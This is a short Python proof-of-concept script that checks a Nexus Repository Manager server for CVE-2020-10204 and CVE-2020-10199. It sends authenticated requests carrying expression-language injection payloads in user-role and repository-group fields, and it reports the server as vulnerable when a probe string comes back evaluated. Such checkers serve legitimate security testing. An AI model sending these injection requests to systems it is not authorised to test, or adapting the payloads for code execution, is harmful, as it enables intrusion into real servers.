#!/usr/bin python3
import requests
import argparse
import json

parse = argparse.ArgumentParser()
parse.add_argument('-i', '--ip', help='ip')
parse.add_argument('-p', '--port', default='8081', help='port')
parse.add_argument('-c', '--cookie', help='HTTP cookie')
parse.add_argument('-csrf', '--csrf', help='NX-ANTI-CSRF-TOKEN')
args = parse.parse_args()

Origin = "http://" + str(args.ip) + ":" + str(args.port)

host = str(args.ip) + ":" + str(args.port)


headers = {
    "Host": host,
    "Referer": Origin,
    "X-Nexus-UI": "true",
    "X-Requested-With": "XMLHttpRequest",
    "NX-ANTI-CSRF-TOKEN": args.csrf,
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/json",
    "cooKie": args.cookie,
    "Origin": Origin,
    "Connection": "close"
}

# CVE-2020-10204 POC
url1 = "http://" + str(args.ip) + ":" + str(args.port) + "/service/extdirect"
form_data1 = {"action": "coreui_User", "method": "update", "data": [
    {"userId": "test", "version": "1.0", "firstName": "xxx", "lastName": "xxx", "email": "test@qq.com",
     "status": "active", "roles": ["$+{'this is vulnerability'.toUpperCase()}"]}], "type": "rpc", "tid": 7}
results1 = requests.post(url1, data=json.dumps(form_data1), headers=headers).text
if "this is vulnerability" in results1:
    print("[*] CVE-2020-10204 vulnerability exists.")
else:
    print("[*] CVE-2020-10204 vulnerability does not exist.")

# CVE-2020-10199 POC
url = "http://" + str(args.ip) + ":" + str(args.port) + "/service/rest/beta/repositories/go/group"
form_data = {"name": "internal", "online": "true",
             "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"},
             "group": {"memberNames": ["${'this is vulnerability'.toUpperCase()}"]}}
results = requests.post(url, data=json.dumps(form_data), headers=headers).text
if "this is vulnerability" in results:
    print("[*] CVE-2020-10199 vulnerability exists.")
else:
    print("[*] CVE-2020-10199 vulnerability does not exist.")
